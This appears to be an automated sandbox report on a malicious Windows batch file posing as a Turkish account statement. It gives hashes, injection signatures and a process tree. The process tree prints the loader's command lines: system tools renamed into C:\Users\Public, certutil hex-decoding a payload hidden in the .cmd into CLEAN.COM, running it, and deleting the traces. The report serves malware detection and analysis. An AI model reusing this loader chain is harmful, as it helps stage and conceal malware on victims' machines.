Analysis
max time kernel: 141s
max time network: 124s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 22-07-2024 09:03
Static task: static1
Behavioral task: behavioral1
  Sample: 41570002689_20220814_05352297_HesapOzeti.cmd
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 41570002689_20220814_05352297_HesapOzeti.cmd
  Resource: win10v2004-20240709-en
General
Target: 41570002689_20220814_05352297_HesapOzeti.cmd
Size: 2.8MB
MD5: eb8ef270dfe6887b0c964f718f16bbb8
SHA1: 10a639e651479bfba415991779c24b9377b84a5d
SHA256: 0040025ba2e8d93e1d1c118280257575f28c2e2209707bb9a11c15676c55e944
SHA512: 89dcc90d565e6b5217775638fbd6edaaedbc8dba5de0cee810b27a791603b9980d022b025f66d3ee3692e797ef70bf290611b6e714ff8167fe9e99efe1d4324b
SSDEEP: 24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrnf3m2+K3v:Rr0jYNi8DrApkpUNLgVDzNVpeIh/f2+
Malware Config
Signatures
Executes dropped EXE (8 IoCs)
  pid   Process
  2816  alpha.exe
  2724  alpha.exe
  2844  kn.exe
  2188  alpha.exe
  2636  kn.exe
  2700  CLEAN.COM
  2396  alpha.exe
  2656  alpha.exe

Loads dropped DLL (9 IoCs)
  pid   Process
  2092  cmd.exe
  2092  cmd.exe
  2724  alpha.exe
  2092  cmd.exe
  2188  alpha.exe
  2092  cmd.exe
  2092  cmd.exe
  708   WerFault.exe
  708   WerFault.exe

Program crash (1 IoC)
  pid   pid_target  Process       procid_target
  708   2700        WerFault.exe  38

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   Process
  2700  CLEAN.COM

Suspicious use of WriteProcessMemory (35 IoCs)
  description                          pid   Process    procid_target
  PID 2092 wrote to memory of 2728     2092  cmd.exe    31
  PID 2092 wrote to memory of 2728     2092  cmd.exe    31
  PID 2092 wrote to memory of 2728     2092  cmd.exe    31
  PID 2092 wrote to memory of 2816     2092  cmd.exe    32
  PID 2092 wrote to memory of 2816     2092  cmd.exe    32
  PID 2092 wrote to memory of 2816     2092  cmd.exe    32
  PID 2816 wrote to memory of 2832     2816  alpha.exe  33
  PID 2816 wrote to memory of 2832     2816  alpha.exe  33
  PID 2816 wrote to memory of 2832     2816  alpha.exe  33
  PID 2092 wrote to memory of 2724     2092  cmd.exe    34
  PID 2092 wrote to memory of 2724     2092  cmd.exe    34
  PID 2092 wrote to memory of 2724     2092  cmd.exe    34
  PID 2724 wrote to memory of 2844     2724  alpha.exe  35
  PID 2724 wrote to memory of 2844     2724  alpha.exe  35
  PID 2724 wrote to memory of 2844     2724  alpha.exe  35
  PID 2092 wrote to memory of 2188     2092  cmd.exe    36
  PID 2092 wrote to memory of 2188     2092  cmd.exe    36
  PID 2092 wrote to memory of 2188     2092  cmd.exe    36
  PID 2188 wrote to memory of 2636     2188  alpha.exe  37
  PID 2188 wrote to memory of 2636     2188  alpha.exe  37
  PID 2188 wrote to memory of 2636     2188  alpha.exe  37
  PID 2092 wrote to memory of 2700     2092  cmd.exe    38
  PID 2092 wrote to memory of 2700     2092  cmd.exe    38
  PID 2092 wrote to memory of 2700     2092  cmd.exe    38
  PID 2092 wrote to memory of 2700     2092  cmd.exe    38
  PID 2092 wrote to memory of 2396     2092  cmd.exe    39
  PID 2092 wrote to memory of 2396     2092  cmd.exe    39
  PID 2092 wrote to memory of 2396     2092  cmd.exe    39
  PID 2092 wrote to memory of 2656     2092  cmd.exe    40
  PID 2092 wrote to memory of 2656     2092  cmd.exe    40
  PID 2092 wrote to memory of 2656     2092  cmd.exe    40
  PID 2700 wrote to memory of 708      2700  CLEAN.COM  42
  PID 2700 wrote to memory of 708      2700  CLEAN.COM  42
  PID 2700 wrote to memory of 708      2700  CLEAN.COM  42
  PID 2700 wrote to memory of 708      2700  CLEAN.COM  42
Processes (indentation shows parent/child depth in the process tree)

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd"
  PID: 2092
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory

  C:\Windows\System32\extrac32.exe
    Command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
    PID: 2728

  C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    PID: 2816
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe
      Command line: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      PID: 2832

  C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
    PID: 2724
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

    C:\Users\Public\kn.exe
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
      PID: 2844
      Signatures: Executes dropped EXE

  C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
    PID: 2188
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

    C:\Users\Public\kn.exe
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
      PID: 2636
      Signatures: Executes dropped EXE

  C:\Users\Public\Libraries\CLEAN.COM
    Command line: C:\Users\Public\Libraries\CLEAN.COM
    PID: 2700
    Signatures: Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 712
      PID: 708
      Signatures: Loads dropped DLL; Program crash

  C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    PID: 2396
    Signatures: Executes dropped EXE

  C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
    PID: 2656
    Signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix
Downloads

Filesize: 1.9MB
MD5: 4c63a70c4224e12f302dc97da70bff09
SHA1: 27da43a347a39fc3582ce98bb77726bf0f0d788b
SHA256: 00032a8c09f96d692586cfa0b0894bb12049e8266f9bc8c2a5950f4c542269fd
SHA512: a21072370b65e9a0dc9a7be4c840c4353114e9e1f695cadd46ad1fab2fd751d27e9a38b6dad545bbcba2a2eb93c640791be31fc08e32f055c6fad4efec444544

Filesize: 955KB
MD5: 37d7e65db3d1daaba7f4f3a422f256c0
SHA1: 845ddbc4975214a41098d5d7d1a039e27a9acc9d
SHA256: e6967254aa75982a43c73985e63d60f5b0688ceeb06c11c1748622959cb95c08
SHA512: edb70bdda279422aaded553a3d6d5ad36c1659181394c4c488f41d257b5fa1707f0db456d2c549a7c8ec8944b3ca90703788ccce3f0d8cb26fc43b6fd42a3011

Filesize: 337KB
MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Filesize: 1.1MB
MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2